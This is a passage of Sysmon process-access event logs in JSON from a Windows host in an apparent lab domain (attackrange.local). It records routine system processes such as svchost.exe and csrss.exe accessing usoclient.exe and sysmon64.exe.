05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2216\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-02E2-5F25-0000-0010641E0600}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2216","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-02E2-5F25-0000-0010641E0600}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02E2-5F25-0000-0010641E0600}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02E2-5F25-0000-0010641E0600}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\